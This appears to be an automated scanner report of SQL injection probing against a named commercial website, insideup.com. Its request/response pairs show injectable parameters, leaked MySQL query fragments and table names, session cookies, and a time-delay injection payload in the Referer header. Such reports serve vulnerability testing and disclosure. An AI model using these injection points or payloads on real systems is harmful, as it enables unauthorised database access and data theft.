HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:57:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=27ocen5rmhtuc3u495m1ehnqg5; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:57:53 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ji3d5e3882mj79e54bldivter1; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:58:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=fi5kna2v2iv2v7gfaosg57fhp1; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:58:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=nl7sldjffco85popsi4tt5snd0; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/deco00/project.php?catId=30009&iusrc=i' at line 5
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:58:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8jefqnf094hntquu7vemavnsb7; path=/ Content-Length: 6334 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:35:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=cisdc30msi4elblfrmr8bfama3; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow'/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow'/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow'/deco0' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:35:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=ciacrvi5brg26je34ocgf506p7; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/deco00'/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00'/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30009&group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:22:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9bg3g4g2iek4e8ifh2ekqbsju1; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/deco00/project_dynamic_page_updated.php?catId=30009'&group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009'&group=deco00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:22:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=h5d156rqifh3mdr3ujjq570p17; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00'&template=3' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:29:02 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=etmhhoplhoeiteqs0hg6hmau14; path=/ Content-Length: 2518 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... /deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3&1'=1' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?ca' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:22:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=kbi0oern36nmjv2222iclloog5; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3'' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00&templa' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow'/dima00/leadflow/dima00/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:01:15 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow'/dima00/leadflow/dima00/project.php?ca' OR prj.project_page_url = 'leadflow'/dima00/leadflow/dima00/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow'/dima00/leadflow/dima00/project.php?ca/' at line 5
Request 2
GET /ppc/leadflow''/dima00/leadflow/dima00/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 07:01:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 124 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/dima00/leadflow/dima00/project.php was not found on this server.</p>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00'/leadflow/dima00/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:01:53 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00'/leadflow/dima00/project.php?ca' OR prj.project_page_url = 'leadflow/dima00'/leadflow/dima00/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00'/leadflow/dima00/project.php?ca/' at line 5
Request 2
GET /ppc/leadflow/dima00''/leadflow/dima00/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 07:01:57 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 124 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00''/leadflow/dima00/project.php was not found on this server.</p>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/leadflow'/dima00/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:02:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/leadflow'/dima00/project.php?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow'/dima00/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow'/dima00/project.php?ca/' at line 5
Request 2
GET /ppc/leadflow/dima00/leadflow''/dima00/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 07:02:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 124 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow''/dima00/project.php was not found on this server.</p>
The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/dima00/leadflow/dima00'/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:03:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/leadflow/dima00'/project.php?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00'/project.php?ca/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ca' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00'/project.php?ca/' at line 5
Request 2
GET /ppc/leadflow/dima00/leadflow/dima00''/project.php?ca HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 07:03:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 124 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00''/project.php was not found on this server.</p>
